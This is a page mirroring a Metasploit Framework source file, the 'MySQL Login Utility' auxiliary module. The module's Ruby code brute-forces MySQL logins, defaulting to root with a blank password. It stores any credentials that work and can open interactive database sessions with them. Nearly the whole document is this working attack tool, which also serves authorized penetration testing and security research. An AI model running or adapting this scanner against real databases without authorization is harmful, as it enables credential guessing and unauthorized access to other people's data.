Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/scanner/mysql/mysql_login.rb
28052 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
require 'metasploit/framework/credential_collection'

7
require 'metasploit/framework/login_scanner/mysql'

8


9
class MetasploitModule < Msf::Auxiliary

10
  include Msf::Exploit::Remote::MYSQL

11
  include Msf::Auxiliary::Report

12
  include Msf::Auxiliary::AuthBrute

13
  include Msf::Auxiliary::Scanner

14
  include Msf::Sessions::CreateSessionOptions

15
  include Msf::Auxiliary::CommandShell

16
  include Msf::Auxiliary::ReportSummary

17


18
  def initialize(info = {})

19
    super(

20
      update_info(

21
        info,

22
        'Name' => 'MySQL Login Utility',

23
        'Description' => 'This module simply queries the MySQL instance for a specific user/pass (default is root with blank).',

24
        'Author' => [ 'Bernardo Damele A. G. <bernardo.damele[at]gmail.com>' ],

25
        'License' => MSF_LICENSE,

26
        'References' => [

27
          [ 'CVE', '1999-0502'] # Weak password

28
        ],

29
        # some overrides from authbrute since there is a default username and a blank password

30
        'DefaultOptions' => {

31
          'USERNAME' => 'root',

32
          'BLANK_PASSWORDS' => true,

33
          'CreateSession' => false

34
        },

35
        'Notes' => {

36
          'Reliability' => UNKNOWN_RELIABILITY,

37
          'Stability' => UNKNOWN_STABILITY,

38
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

39
        }

40
      )

41
    )

42


43
    register_options(

44
      [

45
        Opt::Proxies,

46
        OptBool.new('CreateSession', [false, 'Create a new session for every successful login', false])

47
      ]

48
    )

49


50
    if framework.features.enabled?(Msf::FeatureManager::MYSQL_SESSION_TYPE)

51
      add_info('New in Metasploit 6.4 - The %grnCreateSession%clr option within this module can open an interactive session')

52
    else

53
      options_to_deregister = %w[CreateSession]

54
    end

55
    deregister_options(*options_to_deregister)

56
  end

57


58
  # @return [FalseClass]

59
  def create_session?

60
    if framework.features.enabled?(Msf::FeatureManager::MYSQL_SESSION_TYPE)

61
      datastore['CreateSession']

62
    else

63
      false

64
    end

65
  end

66


67
  def target

68
    [rhost, rport].join(":")

69
  end

70


71
  def run

72
    results = super

73
    logins = results.flat_map { |_k, v| v[:successful_logins] }

74
    sessions = results.flat_map { |_k, v| v[:successful_sessions] }

75
    print_status("Bruteforce completed, #{logins.size} #{logins.size == 1 ? 'credential was' : 'credentials were'} successful.")

76
    return results unless framework.features.enabled?(Msf::FeatureManager::MYSQL_SESSION_TYPE)

77


78
    if create_session?

79
      print_status("#{sessions.size} MySQL #{sessions.size == 1 ? 'session was' : 'sessions were'} opened successfully.")

80
    else

81
      print_status('You can open an MySQL session with these credentials and %grnCreateSession%clr set to true')

82
    end

83
    results

84
  end

85


86
  def run_host(ip)

87
    begin

88
      if mysql_version_check("4.1.1") # Pushing down to 4.1.1.

89
        cred_collection = build_credential_collection(

90
          username: datastore['USERNAME'],

91
          password: datastore['PASSWORD']

92
        )

93


94
        scanner = Metasploit::Framework::LoginScanner::MySQL.new(

95
          configure_login_scanner(

96
            cred_details: cred_collection,

97
            stop_on_success: datastore['STOP_ON_SUCCESS'],

98
            bruteforce_speed: datastore['BRUTEFORCE_SPEED'],

99
            connection_timeout: 30,

100
            max_send_size: datastore['TCP::max_send_size'],

101
            send_delay: datastore['TCP::send_delay'],

102
            framework: framework,

103
            framework_module: self,

104
            use_client_as_proof: create_session?,

105
            ssl: datastore['SSL'],

106
            ssl_version: datastore['SSLVersion'],

107
            ssl_verify_mode: datastore['SSLVerifyMode'],

108
            ssl_cipher: datastore['SSLCipher'],

109
            local_port: datastore['CPORT'],

110
            local_host: datastore['CHOST']

111
          )

112
        )

113


114
        successful_logins = []

115
        successful_sessions = []

116
        scanner.scan! do |result|

117
          credential_data = result.to_h

118
          credential_data.merge!(

119
            module_fullname: self.fullname,

120
            workspace_id: myworkspace_id

121
          )

122
          if result.success?

123
            credential_core = create_credential(credential_data)

124
            credential_data[:core] = credential_core

125
            create_credential_login(credential_data)

126


127
            print_brute :level => :good, :ip => ip, :msg => "Success: '#{result.credential}'"

128
            successful_logins << result

129


130
            if create_session?

131
              begin

132
                successful_sessions << session_setup(result)

133
              rescue ::StandardError => e

134
                elog('Failed to setup the session', error: e)

135
                print_brute level: :error, ip: ip, msg: "Failed to setup the session - #{e.class} #{e.message}"

136
                result.connection.close unless result.connection.nil?

137
              end

138
            end

139
          else

140
            invalidate_login(credential_data)

141
            vprint_error "#{ip}:#{rport} - LOGIN FAILED: #{result.credential} (#{result.status}: #{result.proof})"

142
          end

143
        end

144


145
      else

146
        vprint_error "#{target} - Unsupported target version of MySQL detected. Skipping."

147
      end

148
    rescue ::Rex::ConnectionError, ::EOFError => e

149
      vprint_error "#{target} - Unable to connect: #{e.to_s}"

150
    end

151
    { successful_logins: successful_logins, successful_sessions: successful_sessions }

152
  end

153


154
  # Tmtm's rbmysql is only good for recent versions of mysql, according

155
  # to http://www.tmtm.org/en/mysql/ruby/. We'll need to write our own

156
  # auth checker for earlier versions. Shouldn't be too hard.

157
  # This code is essentially the same as the mysql_version module, just less

158
  # whitespace and returns false on errors.

159
  def mysql_version_check(target = "5.0.67") # Oldest the library claims.

160
    begin

161
      s = connect(false)

162
      data = s.get

163
      disconnect(s)

164
    rescue ::Rex::ConnectionError, ::EOFError => e

165
      raise e

166
    rescue ::Exception => e

167
      vprint_error("#{rhost}:#{rport} error checking version #{e.class} #{e}")

168
      return false

169
    end

170
    offset = 0

171
    l0, l1, l2 = data[offset, 3].unpack('CCC')

172
    return false if data.length < 3

173


174
    length = l0 | (l1 << 8) | (l2 << 16)

175
    # Read a bad amount of data

176
    return if length != (data.length - 4)

177


178
    offset += 4

179
    proto = data[offset, 1].unpack('C')[0]

180
    # Error condition

181
    return if proto == 255

182


183
    offset += 1

184
    version = data[offset..-1].unpack('Z*')[0]

185
    report_service(:host => rhost, :port => rport, :name => "mysql", :info => version)

186
    short_version = version.split('-')[0]

187
    vprint_good "#{rhost}:#{rport} - Found remote MySQL version #{short_version}"

188
    int_version(short_version) >= int_version(target)

189
  end

190


191
  # Takes a x.y.z version number and turns it into an integer for

192
  # easier comparison. Useful for other things probably so should

193
  # get moved up to Rex. Allows for version increments up to 0xff.

194
  def int_version(str)

195
    int = 0

196
    begin # Okay, if you're not exactly what I expect, just return 0

197
      return 0 unless str =~ /^[0-9]+\x2e[0-9]+/

198


199
      digits = str.split(".")[0, 3].map { |x| x.to_i }

200
      digits[2] ||= 0 # Nil protection

201
      int = (digits[0] << 16)

202
      int += (digits[1] << 8)

203
      int += digits[2]

204
    rescue

205
      return int

206
    end

207
  end

208


209
  # @param [Metasploit::Framework::LoginScanner::Result] result

210
  # @return [Msf::Sessions::MySQL]

211
  def session_setup(result)

212
    return unless (result.connection && result.proof)

213


214
    my_session = Msf::Sessions::MySQL.new(result.connection, { client: result.proof, **result.proof.detect_platform_and_arch })

215
    merge_me = {

216
      'USERPASS_FILE' => nil,

217
      'USER_FILE' => nil,

218
      'PASS_FILE' => nil,

219
      'USERNAME' => result.credential.public,

220
      'PASSWORD' => result.credential.private

221
    }

222


223
    start_session(self, nil, merge_me, false, my_session.rstream, my_session)

224
  end

225
end

226


227